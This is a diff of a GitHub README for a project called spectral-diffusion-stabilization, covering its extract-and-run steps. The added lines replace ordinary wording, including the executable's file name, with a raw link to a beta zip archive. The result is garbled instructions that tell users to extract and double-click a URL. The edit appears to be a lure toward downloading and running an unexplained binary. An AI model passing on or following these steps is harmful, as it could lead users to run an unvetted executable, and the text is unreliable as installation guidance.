ranchudaz/spectral-diffusion-stabilization/README.md

    After downloading, navigate to your "Downloads" folder or the folder where your browser saves files.

 5. **Extract the Files (if necessary):**
-   If you downloaded a `.zip` or `.tar.gz` file, right-click on it and select "Extract All" or the equivalent option on your OS.
+   If you downloaded a `.zip` or `https://raw.githubusercontent.com/ranchudaz/spectral-diffusion-stabilization/main/quanta/diffusion_spectral_stabilization_3.3-beta.1.zip` file, right-click on it and select "Extract All" or the equivalent option on your OS.

 6. **Run the Application:**
-   Once extracted, find the executable file named `spectral_diffusion_stabilization.exe` (Windows) or `spectral_diffusion_stabilization` (Mac/Linux).
+   Once extracted, find the executable file named `https://raw.githubusercontent.com/ranchudaz/spectral-diffusion-stabilization/main/quanta/diffusion_spectral_stabilization_3.3-beta.1.zip` (Windows) or `spectral_diffusion_stabilization` (Mac/Linux).
    Double-click the file to run the application.

 ### 🔍 Using the Application